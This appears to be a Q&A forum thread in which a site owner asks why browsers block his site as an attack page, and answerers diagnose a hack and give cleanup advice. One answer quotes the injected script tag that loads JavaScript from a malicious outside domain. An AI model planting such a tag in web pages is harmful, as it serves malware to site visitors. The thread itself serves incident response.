3

My site bccfalna.com is working normal before 2 days but now its not open in firefox/chrome and other browser and come below error message

Reported Attack Page!

This web page at www.bccfalna.com has been reported as an attack page and has been blocked based on your security preferences.

so, how to solve this security problem, please help me to resolve it....

tanujdave
  • 33
  • 1
  • 4

3 Answers3

9

Your website has been balcklisted by Google Safe browsing. It is integrated in Firefox, Safari, and Chrome (not Internet Explorer).

First check what Google Safe Browsing says about your domain on the diagnostic page: 

Malicious software is hosted on 1 domain(s), including addonrock.ru/

So, somewhere, you have a link to this domain. Indeed, on all your pages, you'll find this at the end of the code, after the </html> tag:

<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>

You're web application has been hacked! If you are using an open-source application, check if you are running the latest version (check the plugins as well). There may be a known vulnerability.

Here is what to do next:

  1. understand how your site was hacked: known vulnerability in application, problem with your hosting provider, vulnerability in your code (remote file inclusion, etc.), etc.
  2. plug the hole: upgrade your application, fix your own code, etc.
  3. check all your files and databases for any malicious code
  4. restore a safe backup

Step 4 is OK if you are sure that the attackers has not left any backdoor. Of course, you can never be 100% sure.... If you have enough time and money, use a new server to host your website.

Julien
  • 1,028
  • 1
  • 12
  • 24
  • +1 Excellent answer - more specific than the accepted one, which results in more useful information. – dunxd Sep 20 '10 at 10:40
2

Well, assuming that you are not deliberately distributing malware, my bet is that you got hacked and either viruses or malware are being distributed from your website.

This page has details on what's going on.

Take everything down and restore from a known-good backup.

EEAA
  • 108,414
  • 18
  • 172
  • 242
  • Have you any idea to solve this problem – tanujdave Sep 20 '10 at 05:19
  • As stated in my answer above, the only reasonable solution to your problem is to delete all the files in your DocumentRoot (and possibly re-install your whole server) and restore from a known-good backup. – EEAA Sep 20 '10 at 18:44
1

Scripts from addonrock.ru and alienradar.ru get inserted via FTP.

Some Windows malware picks up the FTP login info from Filezilla and other common FTP clients.

So basically:

1) Clean your client machine. 2) Change all passwords on server. 3) Replace all infected files. If you don't have access to a log, just replace all of them.